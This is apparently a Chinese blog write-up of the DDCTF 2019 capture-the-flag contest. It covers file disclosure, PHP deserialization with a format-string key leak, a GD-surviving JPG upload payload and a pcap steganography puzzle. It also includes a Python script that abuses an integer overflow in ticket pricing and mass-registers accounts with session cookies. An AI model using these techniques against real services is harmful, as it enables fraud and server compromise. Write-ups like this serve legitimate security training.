DDCTF2019wp

最新推荐文章于 2024-05-16 09:38:03 发布
最新推荐文章于 2024-05-16 09:38:03 发布
阅读量427 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/89409721
版权

第一次参加这种个人的CTF比赛 真的比较难过 被打得有点自闭 赛后补题开始。

  1. 滴滴滴
    这道题脑洞题 页面开始是一个心情复杂.jpg 23333 刚开始当然是手动F12看源码 然后发现字符串经过了转HEX+两次base64 于是写一个脚本搞他是很重要的~
    这之后就想到把index.php写进去 发现传进去之后有源码泄露 看到源码后给了一个csdn 这个hint非常的辣鸡。。 自闭了很久 直到下面有朋友给出提示才去另一个时间下的博客找 发现了practice.txt.swp文件。。。。。。。。。。。。。。。。。。。。什么 当然是写脚本找!!!
    脚本见https://github.com/godspeedcurry/CTF/blob/master/web/sql/fuzzFile.py
    后面就是傻吊的绕过了 这里避开不谈

  2. WEB 签到题
    自闭了 第一关我就没找到办法。。。
    看题解
    改成admin就好了
    在这里插入图片描述
    现在才发现hackbar真的不能postdata
    找了一下插件
    https://apizza.net/pro/#/
    用它发送数据真的好用
    我们需要审查代码 最好在自己的环境下搞 这样还能调试
    代码中我们发现有个位置可以反序列化,所以我们给自己创建一个对象 将序列化的内容发送给对方服务器,同时给这段内容做签名,签名需要用对面的秘钥
    这个秘钥可以通过nickname发给对面一个%s来获得服务器会把格式化后的内容返还给我们,我们可以用他来签名 整个过程还是比较多的 很容易走错路= =
    DDCTF{ddctf2019_G4uqwj6E_pHVlHIDDGdV8qA2j}

  3. upload_img
    考察php-GD库 没用过这玩意 更不知道这东西有漏洞。。。多搜索吧
    上传一个文件 他会保存文件到一个目录下 下载下来 发现有了改动 我们的phpinfo会被去掉
    因此找了个脚本来上传文件 图片选择尽可能大即可 我找了个百度的首页。。。。
    ·ubuntu
    apt install php-gd
    git clone https://github.com/BlackFan/jpg_payload
    修改一下脚本里的payload即可
    flag:DDCTF{B3s7_7ry_php1nf0_323fdbdfe29c9fad}

4.吃鸡
这道题比较有意思 你需要买门票来参与游戏买完之后需要搞定其他99人来吃鸡
通过抓包我们可以发现购买门票的时候有一个请求ticket_price=xxxx 我们通过修改ticket_price=某个大整数可以溢出答案
经过测试这个大整数可以为4294967296
于是手动创建一个游戏局 发现要kill其他人 这个过程可以重复 用脚本来创建账号
难点在于后面可能会有小号创建的id和ticket已存在的情况于是要等比较久的时间 可以在自己的服务器和电脑上同时跑

import os
import requests
import time
username = []
password = []
# generate a lot of account
for i in range(1050):
	s = os.urandom(20).encode('hex')
	username.append(s)
	password.append(s)
url_register = "http://117.51.147.155:5050/ctf/api/register?name={0}&password={1}"
url_buy_ticket = "http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967296"
url_pay_ticket = "http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id={0}"
url_main = "http://117.51.147.155:5050/ctf/api/remove_robot?id={0}&ticket={1}"


def start_remove(y_id,y_ticket):
	mycookie = {
		"user_name":"asdfghjklasdfghjkl",
		"REVEL_SESSION":"d083754c3b6a4bd5756272cdad1ae65a"
	}
	r = requests.get(url_main.format(y_id,y_ticket),cookies=mycookie)
	if r.status_code == 200:
		return True
	else:
		return False
for i in range(1000):
	print 'start create ....{0}'.format(i)
	user = username[i]
	passwd = password[i]
	r = requests.get(url_register.format(user,passwd))
	u_cookie = r.cookies['user_name']
	u_session = r.cookies['REVEL_SESSION']
	u_cookie_data = {
		"user_name":u_cookie,
		"REVEL_SESSION":u_session
	}
	r = requests.get(
		url_buy_ticket,
		cookies=u_cookie_data
	)
	# print r.json()
	bill = r.json()['data'][0]['bill_id'] # number of bill

	r = requests.get(
		url_pay_ticket.format(bill),
		cookies=u_cookie_data
	)
	y_id = r.json()['data'][0]['your_id']
	y_ticket = r.json()['data'][0]['your_ticket']
	print y_id
	print y_ticket
	time.sleep(2)
	stata = start_remove(y_id,y_ticket)
	if stata == False:
		print "Error"

DDCTF{chiken_dinner_hyMCX[n47Fx)}

  1. wireshark
    拖入wireshark 导出http分组
    可以发现有两张图片 恢复之 用Tweakpng做一下校验 可以发现png文件有修改的哼唧 于是修改高度 可以发现钥匙那张图片下有我们的key 后面我们又发现一个叫job51的网站 于是访问他发现有个隐写工具 拿他来解码就行了
>>> s = '44444354467B4E62756942556C52356C687777324F6670456D75655A6436344F6C524A3144327D'
>>> s.decode('hex')
'DDCTF{NbuiBUlR5lhww2OfpEmueZd64OlRJ1D2}'
>>>
god_speed丶
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
DDCTF2019-WP-wireshark
yi_ke_wu_hua_guo的博客
04-24 894
wireshark 链接:https://pan.baidu.com/s/1HMZ0oO_fFy1RPpVv2rBzJQ 提取码:ru3f 打开pacp包直接过滤HTTP流量(wireshark题的信息多是隐藏在HTTP的url,html或者图片里面),直接过滤 可以看到流量中存在png包,分析整个HTTP流中存在3张图片的下载,并且如上图所示在第一个请求中存在网站请求http://tools...
2019DDctfWP
BerL1n
12-29 552
Time: 2019-04-27 11:46 本来想挺进前三十呢,结果大佬们都太强了,无奈。。 web 滴~ 打开界面就一张图片。 注意url http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 参数这经过一次base16,两次base64,加密,解密后也就是flag.jpg,因此可尝试读取index.php,经过加密后为TmprMlJUWTBOalUzT0RKRk56QTJPRGN3 访问源代码 base64解
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
CTF】DDCTF-2019
网络安全从业者的学习笔记
08-20 253
虽然刚导出的http文件中包含一个已存在的看似相同的风景图片,但文件大小却不相同,可以猜测一个是加密之前的图片,另外一个则是被加密后的。将多余的信息删除,只留下PNG文件(以89 50 4E 47 开头,以49 45 4E 44结尾)。下载附件,是一个PCAPNG文件,使用wireshark包打开,并搜索http协议的包。那么另外一张图片就是加密图片了,通过之前寻找到的网站进行解密,得到base16的密文。选择文件时可以看到带有钥匙的图片明显存在高度被隐藏。,还有一些PNG等文件,将文件导出。
2019DDCTF 部分Writeup
观樂。的博客
04-19 2027
2019DDCTF 部分Writeup 太菜了,就只做了四道题,而且其中不乏大佬们的提示,这里就记录下做了的题… Web 滴~ 题目地址:http://117.51.150.246 打开后题目跳转到这个地址:http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 界面显示如下图: 然后看传入的jpg的值是bas...
190505 逆向-DDCTF2019(Reverse)
热门推荐
whklhhhh的博客
05-06 2万+
咕咕咕咕咕 连续若干CTF以后就是各种考试作业DDL催命_(:з」∠)_ 等这两周各种考察课完了慢慢补各种活儿吧~ 先交一下之前的DDWP-0- 还请各位大佬多指正~ Windows Reverse1 通过段名发现是UPX壳,upx -d脱壳后进行分析 核心函数只是通过data数组做一个转置,反求index即可 值得一说的是data的地址与实际数组有一些偏移 由于输入的可见字符最小下标就是空格的0...
DDCTF部分WP
dydxdz的博客
04-22 6024
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(╯°□°)╯︵ ┻━┻ (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
180420 逆向-DDCTF_WP(Re)
whklhhhh的博客
04-21 1579
Reverse Baby MIPS IDA打开发现几个字符串结构都很清晰,提供16个变量,然后进行16次方程校验 但是运行会发现在中间就因为段错误而异常 尝试许久以后发现几个不太对劲的指令,突兀出现的t,t,t, sp, 跳转等等的机器码都为EB02开头,猜测为花指令,于是使用IDC脚本去花 注意MIPS为定长指令集,每个指令都为4字节,因此需要固定监测指令的头部,否则可能会误清除掉...
DDCTF-Bin部分wp
CharlesGodX的博客
04-21 605
Reverse1 查看文件,发现是upx壳,我们用命令直接脱壳 thunder@thunder-PC:~/Desktop/CTF/reverse/DDCTF2019$ file reverse1_final.exe reverse1_final.exe: PE32 executable (console) Intel 80386, for MS Windows, UPX compressed t...
DDCTF2018出题心得
08-24
DDCTF 2018出题心得与题解分享-欧家俊, 什么是好的 CTF
DDCTF 2020 Web WP
h1nt的博客
09-07 1690
Web一堆题卡在最后一步出不来,难受。Go语言实乃知识盲区 这是一篇复现记录,赞美师傅wywwtwx 参考:DDCTF 2020 Writeup - 安全客,安全资讯平台 Web签到题 前面的相信大家都懂,是JWT爆破,但还是梳理一下 根据提示在用POST传参可以拿到JWT 在拿去爆破后可得到Secret值(似乎是你的用户名,然后群里有师傅用户名乱输然后没爆破出来。。) 爆破工具是c-jwt-cracker(需要的自取) 爆破后去网站https://jwt.io 篡改JWT后 就可以拿到client,
DDCTF 2019 逆向题writeup re1-3
siphre
04-19 812
Re1 windows reverse 1 Upx壳,用工具脱壳。静态分析: 主流程很简单,用户输入input经过sub_401000函数处理后与DDCTF{reverseME}进行比较。 Sub_401000: 看汇编,函数逻辑就是,根据用户输入的字符的ascii码,读取byte_402FF8对应下标的字符。 byte_402FF8是一个倒序的Ascii码可见字符表。004030...
DDCTF2020 Writeup
郁离歌丶的博客
09-11 3421
DDCTF2020 Writeup 全靠lfy带飞orz. Web Web1 照着来一遍请求,拿到jwt,jwt.io看一下是hs256 跑一下key是1,伪造即可拿到client client抓请求发现signature对即可: 逆client,得到signature请求逻辑,根据输出格式、输出长度以及输入,判断出签名是hmacsha256算法,然后密钥是DDCTFWithYou,写个签名脚本打一下 import requests import json import hmac import bas
CTF】【winhex】超详细jpg图片结构分析
weixin_45720193的博客
10-18 9593
本文排版有些乱,例子镶嵌在每个知识点里,但整体实例都是按照顺序讲解的,而对于讲过的知识点不再赘述。本文也将持续更新。名称DHT标记码C4固定4个FF C4其中2个记录亮度,2个记录色度。
CTFjpg图片隐写之zlib压缩数据包的提取
胖虎很忙
11-16 2万+
CTFjpg图片隐写之zlib压缩数据包的提取 今天萌新很开心有幸给萌萌萌萌新们讲解,大周六的按说该睡懒觉,想到了CTF毅然选择了早起,就像毒品一样 ,哈哈哈。进入正题。 看到群里有人发了一张隐写图片,就简单做了一下,没错就是这张,光头。。。头强吧,哈哈哈。拿到隐写图片后对他进行进本操作: (1)右击选择属性,发现没有重要信息; (2)放到stegsolve里面,试了试各种通道,没有收获; (3)...
jpg图片隐写后如何提取/ctf图片隐写-零开始信息安全自学
最新发布
程序员六七的博客
05-16 679
我正在参加「创意开发 投稿大赛」详情请看:掘金创意开发大赛来了!引子对于JPG大家应该是非常熟悉了(文件头: 文件尾:FF D9)
文件的读写基本操作
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
从DDCTF2020-拼图题,学习如何做拼图题
qq_36495104的博客
09-07 1666
题目下载 链接:https://pan.baidu.com/s/1BBQw9mOxnrmPm4o68lEpEQ 提取码:i7hm 拿到题目,给了一张图片demo.jpg和一个压缩包,压缩包里为6400个小图片,这6400个小图片是将demo.jpg切割得来的,而flag就在其中几块小图片上。如何找到这几张图片并把它们拼在一起得到flag。 我这里是利用python的CV2库的图像匹配算法,由于修改原图,将flag写入到图片上会造成小图片与原图上相应位置的图片匹配度降低,当匹配度低于某个阈值时,可认为是将.
WP7程序开发入门指南
"wp7程序开发指南" 该资源是一本针对Windows Phone 7 (简称WP7)应用开发的入门指南,由Microsoft Press出版,适合初学者使用。由于市场上专门针对WP7开发的书籍较为稀缺,因此这本书显得尤为珍贵。书中内容涵盖了WP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值